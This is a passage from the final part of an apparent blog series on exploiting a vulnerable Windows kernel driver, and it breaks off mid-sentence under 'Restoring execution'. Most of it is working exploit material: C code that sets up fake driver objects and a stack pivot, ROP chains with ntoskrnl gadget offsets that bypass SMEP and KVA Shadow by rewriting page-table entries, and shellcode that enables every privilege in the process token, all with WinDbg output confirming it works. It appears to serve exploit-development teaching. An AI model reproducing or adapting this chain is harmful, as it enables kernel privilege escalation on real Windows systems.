In the previous part of the series we successfully confirmed the vulnerabilities we discovered in our target kernel driver by proving that we can leak the base address of ntoskrnl.exe and hijack the execution flow to an arbitrary location of our choice.
In this final part, we will craft a full exploit that allows us to enable all privileges on Windows.
Now that we’ve confirmed both vulnerabilities we can start crafting an exploit. In this phase the first step is to look for research papers or blog posts showing how to exploit this type of vulnerability. After googling a bit I’ve found an interesting presentation showing how to exploit such a vulnerability and what seems the related exploit code.
The general idea of the research is the following:
- Redirect the execution flow to a ROP gadget that allows to perform stack pivoting. In a few words stack pivoting means modifying the stack pointer, that is RSP, to point to an user-mode address X that we control.
- Execute a ROP chain stored at address X that allows to obtain LPE.
- Restore execution.
The exploit shown here won’t work when HVCI is enabled.
Crafting the ROP chain
In order to retrieve gadgets from ntoskrnl.exe I’ve decided to use ropper. A very handy feature of ropper is being able to find specific gadgets based on a syntax similar to “regex”.
Let’s first look for our pivot gadget. We must find a gadget that loads in RSP a value that is below the maximum user-mode address and is a multiple of 8. Multiple of 8 means the last 3 bits of the address must be set to 0. Based on the research paper we are referencing, we can also use gadgets that load a value in ESP as the upper 4 bytes of RSP will be set to 0:
$ python Ropper.py (ropper)> file /mnt/c/DRIVERS/windows11_ntoskrnl.exe [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] File loaded. (windows11_ntoskrnl.exe/PE/x86_64)> search mov rsp, % [INFO] Searching for gadgets: mov rsp, % [INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe 0x00000001404126d8: mov rsp, qword ptr [rcx + 0x10]; jmp rdx; [...] 0x00000001404200df: mov rsp, rbp; pop rbp; ret; (windows11_ntoskrnl.exe/PE/x86_64)> search mov esp, % [INFO] Searching for gadgets: mov esp, % [INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe [...] 0x0000000140b3a980: mov esp, 0xf6000000; ret; [...] 0x000000014040ac03: mov esp, ebx; ret; [...] (windows11_ntoskrnl.exe/PE/x86_64)>
We found two interesting gadgets. Recall that we can control the value of RBX so we control EBX. Let’s inspect the gadgets in WinDbg:
0: kd> uu nt+0x0b3a980 nt!MxCreatePfn+0x94: fffff800`2653a980 c22041 ret 4120h fffff800`2653a983 83c104 add ecx,4 fffff800`2653a986 443bc9 cmp r9d,ecx fffff800`2653a989 72b6 jb nt!MxCreatePfn+0x55 (fffff800`2653a941) fffff800`2653a98b 89bb00010000 mov dword ptr [rbx+100h],edi fffff800`2653a991 443bce cmp r9d,esi fffff800`2653a994 0f82ac620100 jb nt!MiAssignTopLevelRanges+0x12a (fffff800`26550c46) fffff800`2653a99a 488b6c2428 mov rbp,qword ptr [rsp+28h] 0: kd> uu nt+0x040ac03 nt!SymCryptScsTableLoad128Xmm+0x187: fffff800`25e0ac03 8be3 mov esp,ebx fffff800`25e0ac05 c3 ret [...] 0: kd>
The first one mov esp, 0xf6000000; ret;
actually is a ret 4120h
in WinDbg. On the other hand, the second one matches with what we see in WinDbg, so we choose the second one. We observed previously that rbx
corresponds to object+0x30
. So when allocating object
we just need to call VirtualAlloc() specifying the address that we want in the first parameter.
At this point you can try to modify again the function pointer with our stack pivot gadget, set the breakpoints, re-launch the exploit and notice how RSP changes. Below the modified arbitraryCallDriver() function.
For the moment the shellcode could be a dummy shellcode made of dummy instructions such as NOPs (\x90) or whatever you want.
char shellcode[] = "\x48\x89[...]\xC3"; [...] BOOL arbitraryCallDriver(PVOID outputBuffer, SIZE_T outSize) { char* inputBuffer = (char*)VirtualAlloc( NULL, 21, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); char* object = (char*)VirtualAlloc( (LPVOID)(0x0000001afeffe000), 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); printf("[+] object = 0x%p\n", object); object = (char*)(0x1aff000000 - 0x30); printf("[+] second object = 0x%p\n", object); PDEVICE_OBJECT ptr = (PDEVICE_OBJECT)(object + 0x30); memset(object, 0x41, 0x30); printf("[+] ptr = 0x%p\n", ptr); char* object2 = (char*)VirtualAlloc( NULL, SIZE_BUF, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); printf("[+] object2 = 0x%p\n", object2); //0x0000001af5ff0000 memset(object2, 0x43, 0x30); char* driverObject = (char*)VirtualAlloc( NULL, SIZE_BUF, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memset(driverObject, 0x50, SIZE_BUF); printf("[+] driverObject = 0x%p\n", driverObject); char* ptrDriver = driverObject + 0x30; char* pDriverFunction = ptrDriver + 0x1b*8+0x70; *((PDWORD64)pDriverFunction) = g_ntbase+ 0x40ac03; //mov esp, ebx; ret ptr->AttachedDevice = (PDEVICE_OBJECT)(object2 + 0x30); memset(ptr->AttachedDevice, 0x42, SIZE_BUF-0x40); //*((DWORD*)ptr->AttachedDevice) = 0xf6000000; printf("[+] ptr->AttachedDevice = 0x%p\n", ptr->AttachedDevice); PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000feffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (fake_stack == 0) { printf("[-] VirtualAlloc failed with error: %d\n", GetLastError()); exit(0); } printf("[*] fake_stack = 0x%p\n", fake_stack); PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000; memset(fake_stack, 0x41, 0x12000); printf("[*] ropStack = 0x%p\n", ropStack); DWORD index = 0; char* scbase = (char*)VirtualAlloc((LPVOID)0x1a1a1a000000, 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!VirtualLock(scbase, 0x5000)) { printf("[-] virtualLock failed with error: %d\n", GetLastError()); exit(0); } memset(scbase, 0x42, 0x5000); char* sc = scbase + 0x3500; memcpy(sc, shellcode, sizeof(shellcode)); printf("[*] sc = 0x%p\n", sc); //TODO: beginning of rop chain at ropStack #ifdef _DEBUG for (int i = 0; i < index; i++) { printf("ropStack[%d] %p : 0x%p\n", i, &ropStack[i], ropStack[i]); } #endif ptr->AttachedDevice->DriverObject = (_DRIVER_OBJECT*)ptrDriver; ptr->AttachedDevice->AttachedDevice = 0; char* ptr2 = inputBuffer; *(ptr2) = 0; ptr2 += 1; *((PDWORD64)ptr2) = (DWORD64)ptr; printf("[+] User buffer allocated: 0x%8p\n", inputBuffer); DWORD bytesRet = 0; getchar(); BOOL res = DeviceIoControl( g_device, IOCTL_ARBITRARYCALLDRIVER, inputBuffer, SIZE_BUF, outputBuffer, outSize, &bytesRet, NULL ); printf("[*] sent IOCTL_ARBITRARYCALLDRIVER \n"); if (!res) { printf("[-] DeviceIoControl failed with error: %d\n", GetLastError()); } return res; } [...]
The idea of the code above is to allocate object
in a way that points at address 0x0000001afeffffd0
. This way our first rogue _DRIVER_OBJECT will point to address object+0x30 = 0x0000001aff000000
.
When reaching the jmp rax
instruction RBX will contain the value 0x0000001aff000000
that is object+0x30
. This means that when we execute our stack pivoting gadget mov esp, ebx; ret
RSP will be loaded with value 0x00000000ff000000
.
And in fact our ropStack variable will exactly point at address 0x00000000ff000000
. So we are left with filling the memory referenced by ropStack with a ROP chain that bypasses SMEP and finally redirects execution to our shellcode.
Here I provided a diagram that hopefully summarizes the different data structures in user-space memory with their addresses:
First SMEP bypass ROP Chain
Now we can start crafting our ROP chain in order to bypass SMEP. Initially I crafted the following ROP chain (g_ntbase holds the base address of ntoskrnl.exe. I remind we can retrieve it by exploiting the arbitrary MSR read).
//<call MiGetPteAddress in order to get PTE. PTE address returned in rax> ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret; ropStack[index] = (ULONGLONG)(scbase+0x3000); index++; // shellcode address pte ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret; ropStack[index] = g_ntbase + 0x2abae4; index++; //address of nt!MiGetPteAddress ropStack[index] = g_ntbase + 0x2803b8; index++; // jmp rax; // <call MiGetPteAddress in order to get PTE. PTE address returned in rax> // <Flip U=S bit> PTE VA already in rax ropStack[index] = g_ntbase + 0x20FA62; index++; // pop rcx; ret; ropStack[index] = 0x0000000000000063; index++; // DIRTY + ACCESSED + R/W + PRESENT ropStack[index] = g_ntbase + 0x4531f1; index++; // mov byte ptr[rax], cl; ret; ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret; // </Flip U=S bit> // <shellcode> ropStack[index] = (ULONGLONG)sc; index++; // Shellcode address // <shellcode>
The ROP chain above does the following:
- Call
nt!MiGetPteAddress
passing as input the address of our shellcode (later we will think about the shellcode too), in order to retrieve the address of the corresponding PTE, and stores the result in RAX. - Set the bits DIRTY, ACCESSED, R/W, and PRESENT to 1 and OWNER bit to 0 of the PTE.
- Execute the instruction
wbinvd
in order to flush the instruction cache and ensure ROP gadgets are executed and the PTE is modified. - Execute the shellcode.
So now we can just recompile the exploit, set a breakpoint at the first gadget of our ROP chain and launch it (at this point I think it’s unnecessary to use the IDA Pro Debugger so I suggest switching to WinDbg). You can see the breakpoint gets hit:
0: kd> ba e 1 nt+0x2053e5 0: kd> g Breakpoint 0 hit nt!KeRemoveQueueDpcEx+0x125: fffff800`25c053e5 59 pop rcx 0: kd> r rax=fffff80025e0ac03 rbx=0000001aff000000 rcx=000001f6a94d0030 rdx=ffffe18f37ad8000 rsi=ffffe18f365aa00d rdi=000001f6a94d0030 rip=fffff80025c053e5 rsp=00000000ff000008 rbp=0000000000000000 r8=000000000000001b r9=000001f6a94d0030 r10=fffff80025e0ac03 r11=0000000000000000 r12=0000000000000004 r13=ffffe18f35dfa4c0 r14=ffffe18f35dfa3f0 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246 nt!KeRemoveQueueDpcEx+0x125: fffff800`25c053e5 59 pop rcx 0: kd> p KDTARGET: Refreshing KD connection *** Fatal System Error: 0x0000000a (0x00000000FEFFF319,0x00000000000000FF,0x00000000000000F6,0xFFFFF80025E18BE0) [...] 0: kd> !analyze -v [...] IRQL_NOT_LESS_OR_EQUAL (a) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If a kernel debugger is available get the stack backtrace. Arguments: Arg1: 00000000fefff319, memory referenced Arg2: 00000000000000ff, IRQL Arg3: 00000000000000f6, bitfield : bit 0 : value 0 = read operation, 1 = write operation bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status) Arg4: fffff80025e18be0, address which referenced memory Debugging Details: ------------------ [...] BUGCHECK_CODE: a BUGCHECK_P1: fefff319 BUGCHECK_P2: ff BUGCHECK_P3: f6 BUGCHECK_P4: fffff80025e18be0 [...] A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. 0: kd> k # Child-SP RetAddr Call Site 00 fffff800`28a944c8 fffff800`25f668e2 nt!DbgBreakPointWithStatus 01 fffff800`28a944d0 fffff800`25f65fa3 nt!KiBugCheckDebugBreak+0x12 02 fffff800`28a94530 fffff800`25e16c07 nt!KeBugCheck2+0xba3 03 fffff800`28a94ca0 fffff800`25e2c4e9 nt!KeBugCheckEx+0x107 04 fffff800`28a94ce0 fffff800`25e27a34 nt!KiBugCheckDispatch+0x69 05 fffff800`28a94e20 fffff800`25e18be0 nt!KiPageFault+0x474 06 fffff800`28a94fb0 fffff800`25e19567 nt!KiInterruptSubDispatchNoLockNoEtw+0x20 07 00000000`fefff2f0 fffff800`25d1375f nt!KiInterruptDispatchNoLockNoEtw+0x37 08 00000000`fefff480 fffff800`264ae2a6 nt!KeThawExecution+0xef 09 00000000`fefff4b0 fffff800`25d0b38a nt!KdExitDebugger+0xc2 0a 00000000`fefff4e0 fffff800`264ae117 nt!KdpReport+0x136 0b 00000000`fefff520 fffff800`25d0a93e nt!KdpTrap+0x37 0c 00000000`fefff570 fffff800`25d0981f nt!KdTrap+0x22 0d 00000000`fefff5b0 fffff800`25e2c63c nt!KiDispatchException+0x19f 0e 00000000`fefffc90 fffff800`25e24423 nt!KiExceptionDispatch+0x13c 0f 00000000`fefffe70 fffff800`25c053e5 nt!KxDebugTrapOrFault+0x423 10 00000000`ff000008 fffff800`25c03beb nt!KeRemoveQueueDpcEx+0x125 11 00000000`ff000018 00001a1a`1a003500 nt!CmSiMapViewOfSection+0x57 12 00000000`ff000078 41414141`41414141 0x00001a1a`1a003500 13 00000000`ff000080 41414141`41414141 0x41414141`41414141 14 00000000`ff000088 41414141`41414141 0x41414141`41414141 15 00000000`ff000090 41414141`41414141 0x41414141`41414141 [...]
You can see an error happened when trying to dereference memory at address 0x00000000fefff319
close to our ropStack. I thought it may happen due to a page fault (as you can read from WinDbg). So I tried modifying the code as follows:
[...] if (!VirtualLock((char*)ropStack - 0x3000, 0x10000)) { printf("[-] virtualLock failed with error: %d\n", GetLastError()); exit(0); } [...]
The idea is to call VirtualLock() on the pages containing our ROP chain and also on the adjacent pages. Based on MSDN, this Win32 API is supposed to lock the pages in physical memory and should therefore avoid page faults. However, I wasn’t able to solve the issue.
On the other hand I noticed analyzing the stack trace a couple of functions such as nt!KdTrap and nt!KdExitDebugger. So I thought maybe the issue is stepping with the debugger. In fact, if you try to set a breakpoint for example on the fifth ROP gadget, you will notice the breakpoint gets hit confirming the ROP gadgets are actually executed successfully!
So, it looks like we just can’t debug our ROP chain but we can execute it 😅
If we set a breakpoint directly to the first instruction of our shellcode we can see we successfully hit the breakpoint. At this point we can also notice the owner bit of the shellcode’s PTE is set to 0 (supervisor mode) confirming the ROP chain was successful:
0: kd> !process 0 0 DrvExpTemplate.exe PROCESS ffffe18f36e9e0c0 SessionId: 1 Cid: 06f0 Peb: ae8969f000 ParentCid: 0720 DirBase: 119fd2002 ObjectTable: ffff9602fa50b4c0 HandleCount: 51. Image: DrvExpTemplate.exe 0: kd> .process /r /p /i ffffe18f36e9e0c0 You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus: fffff800`25e20ca0 cc int 3 1: kd> dx @$curprocess.Name @$curprocess.Name : DrvExpTemplate.exe Length : 0x12 1: kd> ba e 1 0x00001a1a1a003500 1: kd> g ... Retry sending the same data packet for 64 times. The transport connection between host kernel debugger and target Windows seems lost. please try resync with target, recycle the host debugger, or reboot the target Windows. Breakpoint 0 hit 00001a1a`1a003500 4889c2 mov rdx,rax 0: kd> !pte 0x00001a1a1a003500 VA 00001a1a1a003500 PXE at FFFFFEFF7FBFD1A0 PPE at FFFFFEFF7FA34340 PDE at FFFFFEFF46868680 PTE at FFFFFE8D0D0D0018 contains 8A00000222774867 contains 0A00000129075867 contains 0A000001BBD76867 contains 08000001BCC7A863 pfn 222774 ---DA--UW-V pfn 129075 ---DA--UWEV pfn 1bbd76 ---DA--UWEV pfn 1bcc7a ---DA--KWEV
Now, let’s try to set a breakpoint at the second instruction in the shellcode and see if we hit it:
0: kd> !process 0 0 DrvExpTemplate.exe PROCESS ffffe18f3578e0c0 SessionId: 1 Cid: 0c08 Peb: ede7a83000 ParentCid: 0720 DirBase: 1b7fd5002 ObjectTable: ffff9602ff106c40 HandleCount: 51. Image: DrvExpTemplate.exe 0: kd> .process /r /i /p ffffe18f3578e0c0 You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus: fffff800`25e20ca0 cc int 3 1: kd> dx @$curprocess.Name @$curprocess.Name : DrvExpTemplate.exe Length : 0x12 1: kd> uu 00001a1a`1a003500 L3 00001a1a`1a003500 4889c2 mov rdx,rax 00001a1a`1a003503 488b08 mov rcx,qword ptr [rax] 00001a1a`1a003506 480fbae902 bts rcx,2 1: kd> ba e 1 00001a1a`1a003503 1: kd>
We launch again the exploit and the VM just restarts.
Kernel Virtual Address Shadow
The issue with our SMEP bypass strategy is that it is suitable for versions of Windows 10 released before March 2018. After that, Microsoft introduced Kernel Virtual Address Shadow, a protection technique for mitigating Meltdown vulnerability, having also the secondary effect of preventing kernel-mode execution in user-mode code.
This article was definitely helpful in understanding Kernel Virtual Address Shadow and how to bypass it.
Referring to the article, it is possible to detect if KVA is enabled by checking the PML4 entry (PML4E) of our shellcode’s address. In fact we already did it in WinDbg:
0: kd> !pte 0x00001a1a1a003500 VA 00001a1a1a003500 PXE at FFFFFEFF7FBFD1A0 PPE at FFFFFEFF7FA34340 PDE at FFFFFEFF46868680 PTE at FFFFFE8D0D0D0018 contains 8A00000222774867 contains 0A00000129075867 contains 0A000001BBD76867 contains 08000001BCC7A863 pfn 222774 ---DA--UW-V pfn 129075 ---DA--UWEV pfn 1bbd76 ---DA--UWEV pfn 1bcc7a ---DA--KWEV
We can see bits of our PML4 entry (known as PX entry or PXE in Windows) are ---DA--UW-V
. So It’s not executable (the E
flag doesn’t appear in WinDbg) as explained in the article.
According to the article, the strategy for bypassing KVA and SMEP is the following:
- Retrieve the PML4E’s address.
- Set bit at index 63 (NX bit) and bit at index 2 (Owner bit) to 0 of the PML4E, in order to make the PML4E both executable and with Owner = supervisor (in a x64 architecture, PML4E is a 64 bits value with indexes going from 0 to 63).
A note on SMEP bypass using the CR4 register technique
At this point it would be probably easier to disable SMEP by just using the technique that clears the bit at index 20 of the CR4 register.
However, I didn’t like the idea of possibly triggering +. In addition, using ropper I couldn’t find “nice gadgets” that allow to modify the CR4 register.
Here’s the output of ropper looking for gadgets that save the CR4 register in another one:
(windows11_ntoskrnl.exe/PE/x86_64)> search % %, cr4 [INFO] Searching for gadgets: % %, cr4 [INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe 0x0000000140b14519: add dword ptr [rbp - 0xf], esi; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x0000000140b1451a: jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x000000014042815d: mov r9, cr4; mov r8, cr0; mov ecx, 0x7f; call 0x42c480; nop; ret; 0x0000000140b1451c: mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x000000014042815e: mov rcx, cr4; mov r8, cr0; mov ecx, 0x7f; call 0x42c480; nop; ret; 0x0000000140b14517: sub eax, 1; jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x0000000140b14516: sub r8, 1; jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x0000000140b1451b: int1; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; (windows11_ntoskrnl.exe/PE/x86_64)> search % cr4 [INFO] Searching for gadgets: % cr4 [...] 0x0000000140b1451b: int1; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; (windows11_ntoskrnl.exe/PE/x86_64)>
As you can see, we have some gadgets that are followed by a call to a fixed location (that I would avoid).
The most promising gadget in my opinion was 0x0000000140b1451c: mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
. However, you can see it ends up flipping a bit of the CR4 register, that again may trigger PatchGuard or other unwelcome behavior.
KVA/SMEP bypass ROP chain
The first thing to do in crafting this second ROP chain is retrieving the address of the PML4 entry.
Based on the article, the function for retrieving the PML4E address is CalculatePml4VirtualAddress() and It requires two indexes:
- pml4SelfRefIndex: calculated through ExtractPml4Index() passing as input the pteAddress that is located at
nt!MiGetPteAddress+0x13
. - pml4Index: calculated again through the ExtractPml4Index() but passing as input the address of the shellcode.
The pml4Index can be easily calculated from user-mode, out of the ROP chain, as we already know the address of the shellcode:
[...] unsigned int ExtractPml4Index(PVOID address) { return ((uintptr_t)address >> 39) & 0x1ff; } [...] BOOL arbitraryCallDriver(PVOID outputBuffer, SIZE_T outSize) { [...] memset(scbase, 0x42, 0x5000); char* sc = scbase + 0x3500; memcpy(sc, shellcode, sizeof(shellcode)); unsigned int pml4shellcode_index = ExtractPml4Index(sc); printf("[*] sc = 0x%p\n", sc); printf("[*] pml4shellcode_index 0x%p\n", pml4shellcode_index); //start of ROP chain }
On the other hand, the pml4SelfRefIndex must be calculated inside our ROP chain, as we must start from the address at nt!MiGetPteAddress+0x13
.
So first we read the address at nt!MiGetPteAddress+0x13
and store the result in rax
:
//<get base from nt!MiGetPteAddress+0x13> ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret; ropStack[index] = g_ntbase + 0x2abaf7; index++; // address of nt!MiGetPteAddress+0x13 ropStack[index] = g_ntbase + 0x235aa6; index++; // mov rax, qword ptr [rax]; ret; //<get base from nt!MiGetPteAddress+0x13>
Then we calculate the pml4SelfRefIndex from the address previously stored in rax
. This is like re-implementing the ExtractPml4Index() with ROP gadgets. So we basically have to right shift rax by 39 and then and rax with constant 0x1ff.
This is achieved with the ROP chain below where we shift right rax
by 0xc+0xc+0xc+3=0x27 (0x27 corresponds to 39). The calculated pml4SelfRefIndex is finally moved from rax
to rcx
.
//<get pml4Index> ropStack[index] = g_ntbase + 0x34bb9c; index++; // pop rdx; ret; ropStack[index] = 0x1ff; index++; // 0x1ff ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret; ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret; ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret; ropStack[index] = g_ntbase + 0x38738b; index++;//shr rax, 3; ret; ropStack[index] = g_ntbase + 0x358532; index++;// and rax, rdx; ret; //<get pml4index> now pml4index in rax //<move pml4index in rcx> ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret; ropStack[index] = (ULONGLONG)&ropStack[index + 3]; index++; ropStack[index] = g_ntbase + 0x35dbc9; index++; // mov qword ptr [rdx], rax; ret; ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret; ropStack[index] = 0x4141414141414141; index++;//dummy //<mov pml4index in rcx>
Now that we have both indexes we can implement the CalculatePml4VirtualAddress() in the ROP chain.
As we can see the ROP chain below first loads in rax
the constant value 0xffff
. After that It shift left rax
by 0x3 three times, that corresponds to a shift left by 0x9, and then performs an or between rax
and the pml4SelfRefIndex stored in rcx
. It repeats this four times, according to the algorithm in the referenced article.
Finally, it performs one last shift left of rax
by 0xc and or rax with pml4Index*8. At this point the address of the PML4E is now in rax
:
//<get pml4 address> ropStack[index] = g_ntbase + 0x203beb; index++;// pop rax; ret; ropStack[index] = 0xffff; index++; //first round ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret; //second round ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret; //third round ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret; //fourth round ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret; ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret; //fifth round ropStack[index] = g_ntbase + 0x322d1b; index++;// shl rax, 0xc; ret; ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret; ropStack[index] = (DWORD64)pml4shellcode_index * 8; index++; ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret; //<get pml4 address> pml4 address in rax
We then set to 0 the bit at index 2, meaning Owner bit = Supervisor
, and the bit at index 63, the NX bit using the btr instruction:
//<clean owner bit O=S position 2> ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret; ropStack[index] = 0x2; index++; ropStack[index] = g_ntbase + 0x354294; index++;// btr qword ptr [rax], rdx; ret; //<clean owner bit O=S position 2> //<clean NX bit position 63> ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret; ropStack[index] = 63; index++; ropStack[index] = g_ntbase + 0x354294; index++;// btr qword ptr [rax], rdx; ret; //<clean NX bit position 63>
At the end of the chain we just need to execute the wbinvd
instruction in order to flush the CPU instruction cache, ensuring the bits in the PML4E are actually modified, and then redirect execution to our shellcode:
ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret; //<shellcode> ropStack[index] = (ULONGLONG)sc; index++;
At this point we can recompile the PoC with our KVA/SMEP bypass ROP chain, set a breakpoint on the second instruction of our shellcode and notice the breakpoint gets hit successfully. We can also check the status of the PML4 entry to notice it was modified successfully:
``` 0: kd> !process 0 0 DrvExpTemplate.exe PROCESS ffffe18f381130c0 SessionId: 1 Cid: 1e20 Peb: 2d546c7000 ParentCid: 0720 DirBase: 1aea2f002 ObjectTable: ffff9602f9530040 HandleCount: 51. Image: DrvExpTemplate.exe 0: kd> .process /p /r /i ffffe18f381130c0 You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus: fffff800`25e20ca0 cc int 3 1: kd> dx @$curprocess.Name @$curprocess.Name : DrvExpTemplate.exe Length : 0x12 1: kd> ba e 1 00001a1a`1a003503 1: kd> g Breakpoint 0 hit 00001a1a`1a003503 488b08 mov rcx,qword ptr [rax] 1: kd> uu 00001a1a`1a003500 L5 00001a1a`1a003500 4889c2 mov rdx,rax 00001a1a`1a003503 488b08 mov rcx,qword ptr [rax] 00001a1a`1a003506 480fbae902 bts rcx,2 00001a1a`1a00350b 480fbae93f bts rcx,3Fh 00001a1a`1a003510 4831c0 xor rax,rax 1: kd> uu @rip L1 00001a1a`1a003503 488b08 mov rcx,qword ptr [rax] 1: kd> !pte @rip VA 00001a1a1a003503 PXE at FFFFFEFF7FBFD1A0 PPE at FFFFFEFF7FA34340 PDE at FFFFFEFF46868680 PTE at FFFFFE8D0D0D0018 contains 0A000001AA4D0863 contains 0A000001AF9D1867 contains 0A0000019DCD2867 contains 08000001AA0D6867 pfn 1aa4d0 ---DA--KWEV pfn 1af9d1 ---DA--UWEV pfn 19dcd2 ---DA--UWEV pfn 1aa0d6 ---DA--UWEV ```
Increment privileges payload
Here’s the disassembled shellcode payload (generated with https://defuse.ca/online-x86-assembler.htm):
// increment privileges payload xor rax,rax mov rax,QWORD PTR gs:[rax+0x188] mov rax,QWORD PTR [rax+0xb8] mov r8,QWORD PTR [rax+0x4b8] and r8,0xfffffffffffffff0 movabs r9,0x1ff2ffffbc mov QWORD PTR [r8+0x40],r9 mov QWORD PTR [r8+0x48],r9 xor rax,rax //just a random instruction
It does the following:
- Retrieve the current process’s _EPROCESS structure
- Retrieve the associated _TOKEN structure
- Modify the fields Present and Enabled of _SEP_TOKEN_PRIVILEGES structure in order to enable all the privileges.
At this point we can try compiling again our exploit, set a breakpoint at the latest instruction in our shellcode (final xor rax,rax
instruction) and inspect the current token privileges with the !token
command. We can notice all the privileges get enabled successfully as shown below:
0: kd> ba e 1 00001a1a`1a00353f 0: kd> g Breakpoint 0 hit 00001a1a`1a00353f 4831c0 xor rax,rax 1: kd> !token Thread is not impersonating. Using process token... [...] Privs: 02 0x000000002 SeCreateTokenPrivilege Attributes - Enabled 03 0x000000003 SeAssignPrimaryTokenPrivilege Attributes - Enabled 04 0x000000004 SeLockMemoryPrivilege Attributes - Enabled 05 0x000000005 SeIncreaseQuotaPrivilege Attributes - Enabled 07 0x000000007 SeTcbPrivilege Attributes - Enabled 08 0x000000008 SeSecurityPrivilege Attributes - Enabled 09 0x000000009 SeTakeOwnershipPrivilege Attributes - Enabled 10 0x00000000a SeLoadDriverPrivilege Attributes - Enabled 11 0x00000000b SeSystemProfilePrivilege Attributes - Enabled 12 0x00000000c SeSystemtimePrivilege Attributes - Enabled 13 0x00000000d SeProfileSingleProcessPrivilege Attributes - Enabled 14 0x00000000e SeIncreaseBasePriorityPrivilege Attributes - Enabled 15 0x00000000f SeCreatePagefilePrivilege Attributes - Enabled 16 0x000000010 SeCreatePermanentPrivilege Attributes - Enabled 17 0x000000011 SeBackupPrivilege Attributes - Enabled 18 0x000000012 SeRestorePrivilege Attributes - Enabled 19 0x000000013 SeShutdownPrivilege Attributes - Enabled 20 0x000000014 SeDebugPrivilege Attributes - Enabled 21 0x000000015 SeAuditPrivilege Attributes - Enabled 22 0x000000016 SeSystemEnvironmentPrivilege Attributes - Enabled 23 0x000000017 SeChangeNotifyPrivilege Attributes - Enabled Default 25 0x000000019 SeUndockPrivilege Attributes - Enabled 28 0x00000001c SeManageVolumePrivilege Attributes - Enabled 29 0x00000001d SeImpersonatePrivilege Attributes - Enabled 30 0x00000001e SeCreateGlobalPrivilege Attributes - Enabled Default 31 0x00000001f SeTrustedCredManAccessPrivilege Attributes - Enabled 32 0x000000020 SeRelabelPrivilege Attributes - Enabled 33 0x000000021 SeIncreaseWorkingSetPrivilege Attributes - Enabled 34 0x000000022 SeTimeZonePrivilege Attributes - Enabled 35 0x000000023 SeCreateSymbolicLinkPrivilege Attributes - Enabled 36 0x000000024 SeDelegateSessionUserImpersonatePrivilege Attributes - Enabled Authentication ID: (0,5c94a) Impersonation Level: Anonymous TokenType: Primary [...]
Restoring execution
At this point we must find a way to restore the execution flow in order to not cause a BSOD after executing our shellcode. We have two options :
- Executing a
sysret
